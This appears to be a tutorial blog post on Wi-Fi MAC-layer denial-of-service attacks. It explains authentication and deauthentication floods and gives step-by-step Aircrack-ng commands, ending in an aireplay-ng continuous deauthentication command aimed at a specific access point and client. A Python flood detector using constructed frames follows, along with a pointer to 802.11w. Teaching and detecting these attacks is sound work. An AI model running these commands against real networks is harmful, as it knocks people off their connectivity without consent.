Wireless DOS Attacks - NetwaxLab


Monday, March 2, 2015

Wireless DOS Attacks

Today wireless networks are in great demand everywhere because they meet the need of the hour, i.e. mobility, easy deployment and easy troubleshooting, and they are also more cost effective than wired networks.


But it is rightly said that few things have only one face, and the same is true of wireless networks: along with their advantages they have several disadvantages. Wireless networks are less secure than wired networks, and they are highly vulnerable to DOS (Denial of Service) attacks.

DOS attacks are a nightmare for an organization. The impact can range from degraded performance of the wireless network to a complete loss of network availability. Still, many organizations overlook the potential impact of a DOS attack against their wireless network.

Although IEEE 802.11i improves security by using the WPA/WPA2 security protocols instead of WEP, which is a very insecure implementation for wireless networks, 802.11i only protects data frames, not management frames. These unprotected management frames can lead to a MAC-layer DOS attack on a wireless network.

A DOS attack can target many different layers of the OSI model, but here we focus mainly on the Data Link layer, i.e. the MAC layer.

Unencrypted management frames disclose important information about a wireless network, such as its BSSID and the clients associated with it. An attacker can easily carry out a MAC-layer DOS attack using a spoofed access-point MAC address, because the receiver of these frames has no way to tell whether they are legitimate.

The two types of MAC-layer DOS attacks are:
  1. Authentication/Association Flood Attack
  2. Deauthentication/Disassociation Flood Attack

  • Authentication/Association Flood Attack


During an authentication/association flood attack, the attacker sends authentication and association requests to the target access point from many spoofed source MAC addresses. The repeated requests eventually exhaust the memory and processing capacity of the access point, leaving legitimate clients with little or no connection to the wireless network.

  • Deauthentication/Disassociation Flood Attack

In a deauthentication/disassociation flood attack, the attacker transmits spoofed deauthentication or disassociation frames with the source address of the access point. Clients that receive these frames disconnect from the network and attempt to reconnect.

To carry out the attack, the following are needed:
  1. A wireless adapter
  2. The Aircrack-ng suite (Windows/Linux)

Steps:

  • Step 1: Check the name of the wireless adapter with one of the following commands:

iwconfig
airmon-ng


  • Step 2: Scan the surroundings for available wireless networks with the command:
"iwlist wlan0 scan"


The output discloses important information such as the ESSID (name of the wireless network), BSSID (MAC address of the AP), security implementation, channel number, etc.
  • Step 3: Put the wireless interface into monitor mode with the command:
"airmon-ng start <interface_name> [channel_no]"


(Note: the channel number is optional; it is used as a filter to run monitor mode on a specific channel. By default monitor mode is not tied to one channel and runs across all channels.)
  • Step 4: To get information about the clients associated with the access point, run the command:

"airodump-ng --bssid <mac_address of Access point> --channel <channel no> <interface>"


After running the above command you will get output like this:


From here we can locate the MAC address of the client associated with the access point. This is useful when we are running a targeted attack against a single client.
  • Step 5: Use aireplay-ng to send fake deauthentication frames to the client on behalf of the access point


Command description:

"aireplay-ng --deauth 0 -a 90:94:E4:F0:93:E5 -c 68:94:23:2B:98:A3 mon0"

--deauth sends deauthentication packets.
0 is the number of packets to send (0 means unlimited, i.e. continuous sending; it can be any number).
-a is the MAC address of the access point.
-c is the MAC address of the client (station) associated with the access point.
  • Step 6: Checking the effect of the attack

When we launch the attack, the client attached to the access point (MAC address "68:94:23:2B:98:A3") loses its connectivity with the AP and continuously attempts to reconnect, but the process keeps failing until we stop the attack. Following are figures of the client before and after launching the attack.
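From the defender's side, the flood produced in Step 5 is easy to spot in a monitor-mode capture: one BSSID sourcing dozens of deauthentication/disassociation frames per second, which no healthy AP does. The following Python is an added example (not from the original post or from the Aircrack-ng project) that parses raw 802.11 management frames and raises an alert when a BSSID exceeds a per-second deauth/disassoc threshold; the frame builder, MAC addresses and timestamps are constructed test data reusing the AP and client addresses from the command above.

```python
"""Added example: flag a deauthentication/disassociation flood in captured 802.11 frames."""
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A          # 802.11 management-frame subtypes

def mac_str(b):
    return ':'.join(f'{x:02X}' for x in b)

def parse_mgmt(frame):
    """Return (subtype, addr1, addr2, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):   # type 0 = management
        return None
    reason = struct.unpack_from('<H', frame, 24)[0]        # 2-byte reason code after the 24-byte header
    return subtype, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]), reason

def detect_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp, raw_bytes). Returns {bssid: peak count} for every BSSID that
    sourced more than `threshold` deauth/disassoc frames inside a `window`-second sliding window."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None:
            continue
        q = recent[parsed[3]]                 # key on the BSSID the frame claims to come from
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) > threshold:
            alerts[parsed[3]] = max(alerts.get(parsed[3], 0), len(q))
    return alerts

def sample_deauth(dst, src, bssid, subtype=DEAUTH, reason=7):
    """Constructed test frame: frame control, duration, addr1..3, sequence control, reason code."""
    mac = lambda s: bytes.fromhex(s.replace(':', ''))
    return (bytes([subtype << 4, 0x00, 0x3A, 0x01]) + mac(dst) + mac(src) + mac(bssid)
            + b'\x00\x00' + struct.pack('<H', reason))

AP, CLIENT, OTHER_AP = '90:94:E4:F0:93:E5', '68:94:23:2B:98:A3', '00:11:22:33:44:55'  # constructed

def sample_capture():
    """Constructed capture: 30 spoofed deauths in half a second, plus one ordinary deauth elsewhere."""
    flood = [(i * 0.016, sample_deauth(CLIENT, AP, AP)) for i in range(30)]
    benign = [(5.0, sample_deauth(CLIENT, OTHER_AP, OTHER_AP, reason=3))]
    return flood + benign

if __name__ == '__main__':
    print(detect_flood(sample_capture()))   # {'90:94:E4:F0:93:E5': 30}
```

Rate-based detection only shortens the time to notice such a flood; the frames themselves stay forgeable until the network enables protected management frames (IEEE 802.11w), which authenticate deauthentication and disassociation frames.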


